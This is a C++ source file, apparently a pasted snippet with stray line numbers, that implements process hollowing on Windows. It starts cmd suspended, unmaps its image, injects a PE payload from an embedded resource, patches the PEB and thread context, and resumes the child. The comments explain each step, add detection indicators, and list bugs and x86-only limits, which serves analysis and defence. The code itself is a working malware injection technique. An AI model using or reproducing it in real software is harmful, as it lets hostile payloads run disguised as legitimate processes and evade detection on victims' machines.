
Creating a process in memory

  1. #include "stdafx.h"
  2. #include <Windows.h>
  3. #include "createfrommemory.h"
  4.  
// ZwUnmapViewOfSection is exported by ntdll but not declared in the public SDK
// headers, hence the hand-written prototype. The symbol still has to be
// satisfied at link time (presumably ntdll.lib); the build settings are not
// visible here.
extern "C" NTSYSAPI LONG NTAPI ZwUnmapViewOfSection(HANDLE, PVOID);
  6.  
// Translate a PE section's Characteristics into the PAGE_* protection that
// reproduces its access rights.
//
// Only the three top bits matter (IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ,
// IMAGE_SCN_MEM_WRITE); everything else in `characteristics` is ignored.
// A writable section is always mapped read/write (there is no write-only
// page protection), so READ adds nothing once WRITE is set.
//
// @param characteristics  IMAGE_SECTION_HEADER::Characteristics
// @return                 PAGE_NOACCESS / PAGE_EXECUTE / PAGE_READONLY /
//                         PAGE_EXECUTE_READ / PAGE_READWRITE /
//                         PAGE_EXECUTE_READWRITE
ULONG protect(ULONG characteristics)
{
    const bool can_exec  = (characteristics & IMAGE_SCN_MEM_EXECUTE) != 0;
    const bool can_read  = (characteristics & IMAGE_SCN_MEM_READ) != 0;
    const bool can_write = (characteristics & IMAGE_SCN_MEM_WRITE) != 0;

    if (can_write) {
        return can_exec ? PAGE_EXECUTE_READWRITE : PAGE_READWRITE;
    }
    if (can_read) {
        return can_exec ? PAGE_EXECUTE_READ : PAGE_READONLY;
    }
    return can_exec ? PAGE_EXECUTE : PAGE_NOACCESS;
}
  15.  
// Entry point. Starts "cmd" suspended, unmaps its image, copies the PE stored
// in this binary's "Image"/"EXE" resource into the child at that PE's
// preferred ImageBase, rewrites PEB.ImageBaseAddress and the initial thread's
// start address, then resumes the child. This is the well-known
// process-hollowing sequence; from a detection standpoint every step is
// visible from the parent (suspended CreateProcess, unmap of the child's main
// image section, VirtualAllocEx/WriteProcessMemory/VirtualProtectEx into a
// child created suspended, SetThreadContext, ResumeThread), and the resulting
// child's in-memory image no longer matches its on-disk file.
// x86 only: CONTEXT::Ebx/Eax and ULONG(q) do not exist/fit on x64.
// No API result is checked anywhere in this function; see per-line notes.
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
{
    PROCESS_INFORMATION pi;
    STARTUPINFO si = {sizeof si};   // only cb is set; the rest is zero

    // Child created suspended so its primary thread has not entered the
    // original image yet. Return value unchecked: on failure pi is
    // uninitialized and every handle use below is invalid.
    CreateProcess(0, L"cmd", 0, 0, FALSE, CREATE_SUSPENDED, 0, 0, &si, &pi);

    // First member is ContextFlags; CONTEXT_INTEGER covers the Ebx and Eax
    // fields read/written below.
    CONTEXT context = {CONTEXT_INTEGER};

    GetThreadContext(pi.hThread, &context);

    // Relies on the x86 convention that a new process's initial thread has
    // the PEB address in Ebx; +8 is PEB.ImageBaseAddress. x receives the
    // child's current image base.
    PVOID x;
    ReadProcessMemory(pi.hProcess, PCHAR(context.Ebx) + 8, &x, sizeof x, 0);

    // Drop the original image mapping. Detection note: an unmap of the main
    // image section in a process still suspended from creation is a strong
    // hollowing indicator.
    ZwUnmapViewOfSection(pi.hProcess, x);

    // Payload PE embedded as a resource (type "EXE", name "Image").
    // p is NULL if the resource is absent; the header reads below would then
    // dereference NULL.
    PVOID p = LockResource(LoadResource(0, FindResource(0, L"Image", L"EXE")));

    // e_lfanew is used as-is; no bounds check against the resource size.
    PIMAGE_NT_HEADERS nt = PIMAGE_NT_HEADERS(PCHAR(p) + PIMAGE_DOS_HEADER(p)->e_lfanew);

    // Reserve+commit the payload's preferred base inside the child. Unchecked:
    // if that range is unavailable q is NULL and every write below targets
    // NULL + offset. The code assumes the preferred base is usable (no
    // relocation processing exists here).
    PVOID q = VirtualAllocEx(pi.hProcess,
                             PVOID(nt->OptionalHeader.ImageBase),
                             nt->OptionalHeader.SizeOfImage,
                             MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

    // Headers first, then each section's raw bytes at its RVA.
    WriteProcessMemory(pi.hProcess, q, p, nt->OptionalHeader.SizeOfHeaders, 0);

    PIMAGE_SECTION_HEADER sect = IMAGE_FIRST_SECTION(nt);

    for (ULONG i = 0; i < nt->FileHeader.NumberOfSections; i++) {

        // SizeOfRawData bytes copied; the protection call below uses
        // Misc.VirtualSize, which may differ from the copied length.
        WriteProcessMemory(pi.hProcess,
                           PCHAR(q) + sect[i].VirtualAddress,
                           PCHAR(p) + sect[i].PointerToRawData,
                           sect[i].SizeOfRawData, 0);

        ULONG x;   // old-protection out-param; shadows the outer PVOID x

        // Section characteristics -> page protection via protect().
        VirtualProtectEx(pi.hProcess, PCHAR(q) + sect[i].VirtualAddress, sect[i].Misc.VirtualSize,
                         protect(sect[i].Characteristics), &x);
    }

    // Point PEB.ImageBaseAddress at the new image (same +8 offset as the
    // read above).
    WriteProcessMemory(pi.hProcess, PCHAR(context.Ebx) + 8, &q, sizeof q, 0);

    // Redirect the initial thread: on x86 Eax of a new process's first thread
    // holds the address it will start executing at.
    context.Eax = ULONG(q) + nt->OptionalHeader.AddressOfEntryPoint;

    SetThreadContext(pi.hThread, &context);

    ResumeThread(pi.hThread);

    // pi.hProcess / pi.hThread are never closed; they leak until this
    // process exits.
    return 0;
}